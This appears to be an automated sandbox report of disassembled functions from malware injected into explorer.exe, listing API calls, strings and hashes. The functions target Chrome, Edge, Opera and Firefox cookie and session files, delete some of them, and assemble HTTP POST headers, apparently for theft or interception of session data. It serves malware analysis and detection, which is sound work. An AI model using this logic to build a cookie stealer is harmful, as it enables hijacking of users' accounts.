                            Function 00CE2AC9 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 154stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 274 ce2ac9-ce2af7 275 ce2afd-ce2aff 274->275 276 ce2cab-ce2cb3 274->276 275->276 277 ce2b05-ce2b15 call ce1141 275->277 277->276 280 ce2b1b-ce2b43 call ce1000 * 3 277->280 287 ce2b47 call ce104c 280->287 288 ce2b4c-ce2b66 call ce29b4 287->288 291 ce2b68-ce2b78 call ce29b4 288->291 292 ce2b82-ce2b9a call ce29b4 288->292 291->292 297 ce2b7a-ce2b80 lstrcat 291->297 298 ce2b9c-ce2ba2 lstrcat 292->298 299 ce2ba4-ce2bbb call ce29b4 292->299 297->292 298->299 302 ce2bbd-ce2bc3 lstrcat 299->302 303 ce2bc5-ce2be8 RtlZeroMemory call ce29b4 299->303 302->303 306 ce2bea-ce2bf7 StrToIntA 303->306 307 ce2bf9 303->307 308 ce2bfd-ce2bff 306->308 307->308 309 ce2c88-ce2caa call ce105d call ce1011 * 3 308->309 310 ce2c05-ce2c08 308->310 309->276 310->309 312 ce2c0a-ce2c11 310->312 312->309 314 ce2c13-ce2c19 312->314 316 ce2c1f call ce104c 314->316 318 ce2c24-ce2c63 wnsprintfA call ce2a02 316->318 324 ce2c69-ce2c77 lstrcat 318->324 325 ce2c65-ce2c67 lstrcat 318->325 327 ce2c79-ce2c7e 324->327 328 ce2c84 324->328 325->324 327->328 329 ce2c80-ce2c82 lstrcat 327->329 328->309 329->328
                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                              • Part of subcall function 00CE104C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00CE1056
                              • Part of subcall function 00CE29B4: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 00CE29F7
                            • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00CE2B80
                            • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00CE2BA2
                            • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00CE2BC3
                            • RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE2BCC
                            • StrToIntA.SHLWAPI(00000000), ref: 00CE2BEF
                            • wnsprintfA.SHLWAPI ref: 00CE2C47
                            • lstrcat.KERNEL32(00000000,?), ref: 00CE2C67
                            • lstrcat.KERNEL32(00000000,{:!:}), ref: 00CE2C6F
                            • lstrcat.KERNEL32(00000000,?), ref: 00CE2C82
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                            • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                            • API String ID: 2605944266-950501416
                            • Opcode ID: 6961c281f3283a8696173d18d7e4fbf3a8d386201901eba049e11c6eb36a953a
                            • Instruction ID: 419b63a53dfb031173d653caa33f941cb9dad1b8ec1d443c285cdff7b8c32b7f
                            • Opcode Fuzzy Hash: 6961c281f3283a8696173d18d7e4fbf3a8d386201901eba049e11c6eb36a953a
                            • Instruction Fuzzy Hash: A051C3706043C15FDB1DEF26C881B2EB7EAAF84354F04081CF89697292CB38DD859756
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE305D Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 124stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            • RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                            • StrToIntA.SHLWAPI(?), ref: 00CE30D7
                            • lstrlen.KERNEL32(00000000), ref: 00CE3105
                            • wsprintfA.USER32 ref: 00CE316C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                            • lstrcat.KERNEL32(?,{:!:}), ref: 00CE31AB
                            • lstrlen.KERNEL32(?,?,?,?,?,00000001), ref: 00CE31BC
                            • RtlMoveMemory.NTDLL(00000000), ref: 00CE31C5
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
                            • String ID: $%s{:!:}%s{:!:}%s{:!:}$Content-Length:$Cookie:$Host:$User-Agent:$application/json$application/x-www-form-urlencoded${:!:}
                            • API String ID: 2886538537-1627781280
                            • Opcode ID: f9f36f284eb7597694a283ccca71c28be7da1ba70944ad317b332957b6a5ac9e
                            • Instruction ID: cc54d6063a68f5de7afd64840be07e6692bb66825f220707d8280e443a23253b
                            • Opcode Fuzzy Hash: f9f36f284eb7597694a283ccca71c28be7da1ba70944ad317b332957b6a5ac9e
                            • Instruction Fuzzy Hash: 0D31E2717003C16BDB18AB278C9AB2F36AEDBC4740F04443CF9029B286DA74ED4997A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE37B3 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 73stringsleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                              • Part of subcall function 00CE1363: lstrcmpi.KERNEL32(?), ref: 00CE13A3
                              • Part of subcall function 00CE1363: Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • Sleep.KERNEL32(000003E8,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE37DB
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE37FC
                            • lstrcatW.KERNEL32(00000000,\Google\Chrome\User Data\), ref: 00CE380E
                              • Part of subcall function 00CE15BE: PathCombineW.SHLWAPI(00000000,00000000,*.*,772D82B0,00000000,74DC3BB0,77D4D600), ref: 00CE15EB
                              • Part of subcall function 00CE15BE: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE15F7
                              • Part of subcall function 00CE15BE: lstrcmpiW.KERNEL32(?,00CE41C8), ref: 00CE1623
                              • Part of subcall function 00CE15BE: lstrcmpiW.KERNEL32(?,00CE41CC), ref: 00CE1633
                              • Part of subcall function 00CE15BE: PathCombineW.SHLWAPI(00000000,?,?), ref: 00CE164C
                              • Part of subcall function 00CE15BE: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE169C
                              • Part of subcall function 00CE15BE: FindClose.KERNEL32(00000000), ref: 00CE16AB
                            • RtlZeroMemory.NTDLL(00000000,00001000), ref: 00CE3824
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE382D
                            • lstrcatW.KERNEL32(00000000,\Microsoft\Edge\User Data\), ref: 00CE3839
                            • RtlZeroMemory.NTDLL(00000000,00001000), ref: 00CE384D
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,00000001,?,?,00CE38E3,?,00CE3C5C,00000001), ref: 00CE3856
                            • lstrcatW.KERNEL32(00000000,\Opera Software\Opera Stable\), ref: 00CE3862
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Path$FindFolderSpeciallstrcatlstrcmpi$CloseCombineFileFirstHeapMemoryNextProcess32Zero$AllocateCreateHandleProcessSleepSnapshotToolhelp32
                            • String ID: Cookies*$\Google\Chrome\User Data\$\Microsoft\Edge\User Data\$\Opera Software\Opera Stable\$chrome.exe$msedge.exe$opera.exe
                            • API String ID: 909495591-1175993956
                            • Opcode ID: c27aef6f1450ffac015b77dac7434adf20f983906f31d726e037163eebd12d3d
                            • Instruction ID: 49bb08cb96476d96d17ab7f0ce998b30a2d5ab110e41c0d8a709907c54384225
                            • Opcode Fuzzy Hash: c27aef6f1450ffac015b77dac7434adf20f983906f31d726e037163eebd12d3d
                            • Instruction Fuzzy Hash: 3611A5703823D877E92933635C87F6F564DDF96B91F140025FA059F2C2CEA49E1152BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE367E Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 64stringsleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                              • Part of subcall function 00CE1363: lstrcmpi.KERNEL32(?), ref: 00CE13A3
                              • Part of subcall function 00CE1363: Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • Sleep.KERNEL32(000003E8,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE36A4
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE36BD
                            • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00CE36CD
                            • wsprintfW.USER32 ref: 00CE36EE
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000,?,00000000,?,00CE38D9,?,00CE3C5C,00000001), ref: 00CE371C
                            • lstrcatW.KERNEL32(00000000,00CE45F4), ref: 00CE372C
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                            • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                            • API String ID: 2436889709-3669280581
                            • Opcode ID: 8bb0ac5987d2e27e9c7e048f0b450d2700d5097cbffd78844dbf7755914a8850
                            • Instruction ID: a52b9e81d1a8941c44fb3a94beb1e44e077eff55255132514a78323adefa3e3b
                            • Opcode Fuzzy Hash: 8bb0ac5987d2e27e9c7e048f0b450d2700d5097cbffd78844dbf7755914a8850
                            • Instruction Fuzzy Hash: 7511A1717402C067EF1C33676CCEF3E256AEBC5B51F080028FB16AA2D1CEA409906276
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE31E5 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 141stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 436 ce31e5-ce31fa 437 ce339d-ce33a4 436->437 438 ce3200-ce322c 436->438 440 ce322e-ce3232 438->440 441 ce3238-ce329a call ce1000 438->441 440->437 440->441 447 ce329c-ce32ad 441->447 448 ce32b4-ce32d9 call ce1000 441->448 447->448 452 ce32df-ce32ea lstrlen 448->452 453 ce338b-ce339c call ce1011 * 2 448->453 452->453 455 ce32f0-ce3302 call ce1141 452->455 453->437 455->453 460 ce3308-ce3385 call ce1000 * 2 wsprintfA lstrcat call ce1011 lstrcat lstrlen RtlMoveMemory 455->460 460->453
                            APIs
                            • lstrlen.KERNEL32(00000000), ref: 00CE32E0
                            • wsprintfA.USER32 ref: 00CE3351
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00CE3362
                            • lstrcat.KERNEL32(00000000,{:!:}), ref: 00CE3371
                            • lstrlen.KERNEL32(00000000), ref: 00CE3374
                            • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00CE3385
                              • Part of subcall function 00CE1011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,00CE14CB), ref: 00CE1020
                              • Part of subcall function 00CE1011: HeapFree.KERNEL32(00000000), ref: 00CE1027
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Heaplstrcatlstrlen$FreeMemoryMoveProcesswsprintf
                            • String ID: %s{:!:}%s{:!:}%s{:!:}$POST${:!:}
                            • API String ID: 3430864794-1604029033
                            • Opcode ID: e8a46ea6bce34381c46e81d71e8cbe73491601f3f7b07922cd456a224b5d1c1e
                            • Instruction ID: b4eb7271bd3e6535f44415011e4f6b927aef2364462791af0e24efac8d838d3f
                            • Opcode Fuzzy Hash: e8a46ea6bce34381c46e81d71e8cbe73491601f3f7b07922cd456a224b5d1c1e
                            • Instruction Fuzzy Hash: 04417C71108385AFD3159F11DC88F6FBBEDFB84345F04092EF98296251DB74AA488BA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE34E4 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 115stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 469 ce34e4-ce3506 RtlEnterCriticalSection 470 ce356e-ce3576 469->470 471 ce3508-ce350e 469->471 472 ce357c-ce3585 call ce1274 470->472 473 ce3658-ce367d RtlLeaveCriticalSection 470->473 471->470 474 ce3510-ce3512 471->474 472->473 480 ce358b-ce3591 472->480 474->473 476 ce3518-ce3521 call ce1274 474->476 476->470 484 ce3523-ce3530 call ce1274 476->484 482 ce364f-ce3653 call ce2e25 480->482 483 ce3597-ce35ba RtlZeroMemory call ce2ff0 480->483 482->473 483->473 490 ce35c0-ce35cf StrToIntA 483->490 484->470 491 ce3532-ce3568 lstrcat call ce305d call ce2f87 call ce105d 484->491 490->473 492 ce35d5-ce35e7 call ce1141 490->492 491->470 492->473 498 ce35e9-ce35f2 492->498 500 ce35f4-ce3609 498->500 501 ce3631-ce364d call ce305d call ce2f87 498->501 503 ce360b-ce3610 call ce105d 500->503 504 ce3617-ce361a 500->504 501->473 503->504 508 ce361c call ce104c 504->508 512 ce3621-ce362f RtlMoveMemory 508->512 512->473
                            APIs
                            • RtlEnterCriticalSection.NTDLL(00CE6030), ref: 00CE34F0
                            • lstrcat.KERNEL32(?), ref: 00CE3545
                              • Part of subcall function 00CE305D: RtlZeroMemory.NTDLL(?,0000000A), ref: 00CE30AD
                              • Part of subcall function 00CE305D: StrToIntA.SHLWAPI(?), ref: 00CE30D7
                              • Part of subcall function 00CE305D: lstrlen.KERNEL32(00000000), ref: 00CE3105
                              • Part of subcall function 00CE305D: wsprintfA.USER32 ref: 00CE316C
                              • Part of subcall function 00CE305D: lstrcat.KERNEL32(00000000,00000000), ref: 00CE3198
                              • Part of subcall function 00CE105D: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00CE1065
                            • RtlZeroMemory.NTDLL(0000000A,0000000A), ref: 00CE359E
                            • StrToIntA.SHLWAPI(?), ref: 00CE35C5
                            • RtlMoveMemory.NTDLL(00000000,?,-00000003), ref: 00CE3629
                            • RtlLeaveCriticalSection.NTDLL(00CE6030), ref: 00CE365D
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$CriticalSectionVirtualZerolstrcat$EnterFreeLeaveMoveQuerylstrlenwsprintf
                            • String ID: $Content-Length:$POST
                            • API String ID: 2577380748-114478848
                            • Opcode ID: 436169088476d0b70812bcb828bb01ec1d5c6f99448ce8915d6370c268b32209
                            • Instruction ID: 464ed4c23f3e0623f3873b5d2be6e9d39987d5a4fc6a928f3bedfbd453e6ab55
                            • Opcode Fuzzy Hash: 436169088476d0b70812bcb828bb01ec1d5c6f99448ce8915d6370c268b32209
                            • Instruction Fuzzy Hash: FB41D4316013D0ABCB24EF63ACC872E3B69AB94350F14042DF9164B352CB359B08D765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1902 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                              • Part of subcall function 00CE106C: lstrlen.KERNEL32 ref: 00CE1074
                              • Part of subcall function 00CE106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001), ref: 00CE1086
                              • Part of subcall function 00CE17B5: RtlZeroMemory.NTDLL(?,00000018), ref: 00CE17C7
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 00CE199A
                            • wsprintfW.USER32 ref: 00CE1AD3
                            • wsprintfW.USER32 ref: 00CE1B3E
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 00CE1C08
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: 10a26b03369b48778ecf6f678cfe972ab51a1818463af81c36f9acdd228b3257
                            • Instruction ID: 239b76734d8d9d8a91c478bdbe3c6357872b48e206a59e07a3cfc32453f8e30c
                            • Opcode Fuzzy Hash: 10a26b03369b48778ecf6f678cfe972ab51a1818463af81c36f9acdd228b3257
                            • Instruction Fuzzy Hash: 94A18C71608384AFD714DF6AD884B2FBBE9EF88340F18092DF996C7251DA34DD548B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE374B Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 37sleepstringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE1363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                              • Part of subcall function 00CE1363: Process32First.KERNEL32(00000000,?), ref: 00CE1393
                              • Part of subcall function 00CE1363: CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                            • Sleep.KERNEL32(000003E8,?,00000000,?,00CE38DE,?,00CE3C5C,00000001), ref: 00CE375D
                              • Part of subcall function 00CE1000: GetProcessHeap.KERNEL32(00000008,00000208,00CE1418), ref: 00CE1003
                              • Part of subcall function 00CE1000: RtlAllocateHeap.NTDLL(00000000), ref: 00CE100A
                            • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000,?,00000000,?,00CE38DE,?,00CE3C5C,00000001), ref: 00CE3776
                            • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 00CE3786
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE150D
                              • Part of subcall function 00CE14D8: FindFirstFileW.KERNEL32(00000000,?), ref: 00CE151C
                              • Part of subcall function 00CE14D8: wsprintfW.USER32 ref: 00CE1557
                              • Part of subcall function 00CE14D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 00CE156A
                              • Part of subcall function 00CE14D8: DeleteFileW.KERNEL32(00000000), ref: 00CE1571
                              • Part of subcall function 00CE14D8: FindNextFileW.KERNEL32(00000000,00000010), ref: 00CE1584
                              • Part of subcall function 00CE14D8: FindClose.KERNEL32(00000000), ref: 00CE158F
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                            • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                            • API String ID: 2731919298-637609321
                            • Opcode ID: 928d604666657ff06a2b9f07aa95ce226634b2fa40c7784cf4b5f157f580d3d0
                            • Instruction ID: ae2c03b6ae9a0994589efbe7e14bd91086e4a859a9e4dbe9888afac725ed935b
                            • Opcode Fuzzy Hash: 928d604666657ff06a2b9f07aa95ce226634b2fa40c7784cf4b5f157f580d3d0
                            • Instruction Fuzzy Hash: 53F0A0B13011D0379A2C33676C4EE3F296EDFD7B52704002CF5169A2D18E280A4252BA
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE2538 Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 190stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE104C: VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 00CE1056
                            • lstrcat.KERNEL32(?,00000000), ref: 00CE2710
                            • lstrcat.KERNEL32(?,00CE42C4), ref: 00CE271C
                            • lstrcat.KERNEL32(?,?), ref: 00CE272B
                            • lstrcat.KERNEL32(?,00CE42C8), ref: 00CE273A
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrcat$AllocVirtual
                            • String ID: :authority$?$dyn_header
                            • API String ID: 3028025275-1785586894
                            • Opcode ID: 81a259412fc565d244f8cc5fc6e4fcc8feb88a98d71e398a6cc2c2ecf62b334b
                            • Instruction ID: ecbf78a2b1bdaa081eac5aede1f90fb4fbeca7569c804fc06e01eee49b94e81a
                            • Opcode Fuzzy Hash: 81a259412fc565d244f8cc5fc6e4fcc8feb88a98d71e398a6cc2c2ecf62b334b
                            • Instruction Fuzzy Hash: 986106725083D28FC718DE27C59176EB7EE9B94310F050A2DF49157282DB389E4DEBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE1363 Relevance: 7.5, APIs: 5, Instructions: 39processstringCOMMON
                            Download Yara Rule
                            APIs
                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE1374
                            • Process32First.KERNEL32(00000000,?), ref: 00CE1393
                            • lstrcmpi.KERNEL32(?), ref: 00CE13A3
                            • Process32Next.KERNEL32(00000000,00000128), ref: 00CE13C0
                            • CloseHandle.KERNEL32(00000000), ref: 00CE13CB
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                            • String ID:
                            • API String ID: 868014591-0
                            • Opcode ID: 9960524654bee6baa002f9d2a0462426c1dd0099fd410cdcabda2f0e4b2d416f
                            • Instruction ID: d7c31f4794f9d3406af451aa3bc78ebe16b97ac7b0fe30733bda4f066571aad7
                            • Opcode Fuzzy Hash: 9960524654bee6baa002f9d2a0462426c1dd0099fd410cdcabda2f0e4b2d416f
                            • Instruction Fuzzy Hash: CAF0FC359011945BC7346B26DC8CFDE77BCDF49321F0401A1FE55D61A0EB744EA48A50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE2A02 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00000000,00001000,?,00000000,00000000,00CE32FE,00000001), ref: 00CE1150
                              • Part of subcall function 00CE1141: lstrlen.KERNEL32(00CE4420), ref: 00CE1155
                            • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 00CE2A70
                            • lstrcat.KERNEL32(?,00CE42D8), ref: 00CE2A7F
                            • lstrlen.KERNEL32(?,?,00000001), ref: 00CE2AB1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: lstrlen$MemoryMovelstrcat
                            • String ID: cookie
                            • API String ID: 2957667536-1295510418
                            • Opcode ID: f7ba41818b961a8551deb455ee88222aafd23bfd1d261229024833979dfe90dc
                            • Instruction ID: 36d5a1d1c293731cb3a798873e3383f879d1cf60000c184ec4d864b4dce14986
                            • Opcode Fuzzy Hash: f7ba41818b961a8551deb455ee88222aafd23bfd1d261229024833979dfe90dc
                            • Instruction Fuzzy Hash: 8B1106723043815BC7249E96EC86B6FB29DDF80B14F1C0539FE1197251EAB1ED0553A0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE12AA Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                            Download Yara Rule
                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000), ref: 00CE12BC
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 00CE12CE
                            • IsWow64Process.KERNEL32(00000000,?), ref: 00CE12E1
                            • CloseHandle.KERNEL32(00000000), ref: 00CE12F7
                            Memory Dump Source
                            • Source File: 0000000A.00000002.507820274.0000000000CE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00CE1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_ce1000_explorer.jbxd
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID:
                            • API String ID: 331459951-0
                            • Opcode ID: 1ca02d70f183a5ff6e212dea64d835bb9522a166f387eb0e2924e3fca5b81537
                            • Instruction ID: f8a09bf2908069049c4762524e2d767468291fed1be084cc0584aca022e08c4a
                            • Opcode Fuzzy Hash: 1ca02d70f183a5ff6e212dea64d835bb9522a166f387eb0e2924e3fca5b81537
                            • Instruction Fuzzy Hash: 3EF09072802298FF9B14DF919D89AEE7B6CEA05251F18026AEE20E6140D7304F0496A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00CE33A7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00CE1274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00CE1281
